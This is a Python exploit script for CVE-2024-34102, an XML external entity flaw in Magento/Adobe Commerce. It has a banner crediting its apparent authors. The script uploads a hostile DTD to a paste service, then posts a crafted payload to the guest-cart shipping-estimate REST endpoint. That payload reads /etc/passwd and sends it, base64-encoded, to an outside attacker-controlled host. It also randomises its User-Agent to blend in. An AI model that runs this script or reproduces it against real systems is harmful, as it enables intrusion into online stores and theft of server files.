#!/bin/bash env python3

import re
import sys
import json
import uuid
import base64
import requests
from fake_useragent import UserAgent

requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)


try:

  style=''' 
           CVE-2024-34102
          Rewrite By Jhonson
Credit to @th3gokul & Sanjaith3hacker for the original code base
         '''
  print(f'\033[93m{style}')

  def main(url,dtd):
     
         
         random_filename = str(uuid.uuid4())
         response = requests.post(url, files={"c": (random_filename, dtd)}, verify=False)
         match = re.search(rf"{url}(?P<uuid>[a-zA-Z0-9\-]+)", response.text)
         if not match:
           raise Exception("Failed to extract the UUID using regex.")
         uuid_value = match.group("uuid")
         return url+uuid_value+'.dtd'



  def exploit (target,header):
      

      base_url = f'{target}/rest/V1/guest-carts/1/estimate-shipping-methods'
      result=requests.post(base_url, json=body, headers=header, verify=False)
      if "/?exploited=" in result.text:
          exploit = re.search(r"exploited=(.*) HTTP", result.text).group(1)
          decode = base64.b64decode(exploit).decode("utf-8")
          print(f'{target} is vulnerable'+f'\n\n\033[94m{decode}') 
          
      else:
          print(f'\033[92m {target} No vulnerable')  

  

  if __name__=='__main__':

      
     data = f'''<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://sabatnth.c5.rs/?exploited=%data;'>">
'''

     save=main('https://fars.ee/',data)



     body = {"address": {
            "totalsCollector": {
                 "collectorList": {
                     "totalCollector": {
                           "sourceData": {
                             "data": f'<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "{save}"> %sp; %param1; ]> <r>&exfil;</r>',
                              "options": 12345678,
                           }
                     }
                 }
            }
        }
      }


     header = {"User-Agent": UserAgent().random}

     target=sys.argv[1]
     exploit(target,header)

     
     
except Exception as e:
      print(e)
